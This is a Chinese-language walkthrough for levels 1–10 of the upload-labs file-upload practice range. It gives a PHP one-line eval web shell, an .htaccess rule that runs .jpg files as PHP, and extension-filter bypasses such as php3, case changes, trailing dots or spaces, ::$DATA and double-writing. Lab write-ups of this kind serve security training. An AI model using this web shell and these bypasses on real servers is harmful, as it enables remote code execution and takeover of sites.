upload-labs靶场：1—10通关教程

目录

Pass-01（JS 验证）

Pass-02（MIME）

Pass-03（黑名单绕过）

Pass-04（.htaccess 绕过）

Pass-05（大小写绕过）

Pass-06（空格绕过）

Pass-07（小数点绕过）

Pass-08（::$DATA 绕过）

Pass-09（小数点和空格结合绕过）

Pass-10（双写绕过）

---

下载地址：GitHub - c0ny1/upload-labs: 一个想帮你总结所有类型的上传漏洞的靶场

1.php 内容：

<?php @eval($_POST[cmd]);?>

Pass-01（JS 验证）

复制一个 php 文件，重命名 1.jpg

<?php @eval($_POST[cmd]);?>

上传，然后拦截数据包，通过burp修改后缀，修改后放包（Burp发送后数据包是已经经过了前端，所以前端校验就会失效），后缀改为php

右键复制图像链接

用蚁剑测试链接

Pass-02（MIME）

提交 抓包 修改后缀为 php

Pass-03（黑名单绕过）

查看源码， 不允许上传.asp,.aspx,.php,.jsp后缀文件

修改 httpd.conf 文件中的这行代码，把前面的#去掉

抓包 修改后缀为 php3

Pass-04（.htaccess 绕过）

黑名单过滤太多，使用 .htaccess 绕过，内容如下，先把 .htaccess 上传，再上传 1.jpg

<FilesMatch "jpg">SetHandler application/x-httpd-php</FilesMatch>

Pass-05（大小写绕过）

查看源码， 上一关的.htaccess文件也过滤掉了，发现没有过滤大小写，本关就用大小写绕过

上传 1.php 一句话木马，抓包修改后缀

Pass-06（空格绕过）

查看源码，大小写被过滤，没有过滤空格，就用空格过滤

上传 1.php 一句话木马，抓包，后缀加一个空格

Pass-07（小数点绕过）

查看源码，大小写被过滤，空格被过滤，没有过滤小数点，就用小数点过滤

上传 1.php 一句话木马，抓包，后缀加个小数点

Pass-08（::$DATA 绕过）

查看源码，小数点 大小写 空格 都被过滤，用 ::$DATA 过滤

上传 1.php 一句话木马，抓包，后缀加 ::$DATA

连接时删掉 ::$DATA

Pass-09（小数点和空格结合绕过）

查看源码，::$DATA 也被过滤，使用结合过滤

上传 1.php 一句话木马，抓包，后缀加 小数点 空格 小数点

Pass-10（双写绕过）

查看源码， str_ireplace()函数 将危险后缀都替换为空，然后尝试用双写绕过

上传 1.php 一句话木马，抓包，修改后缀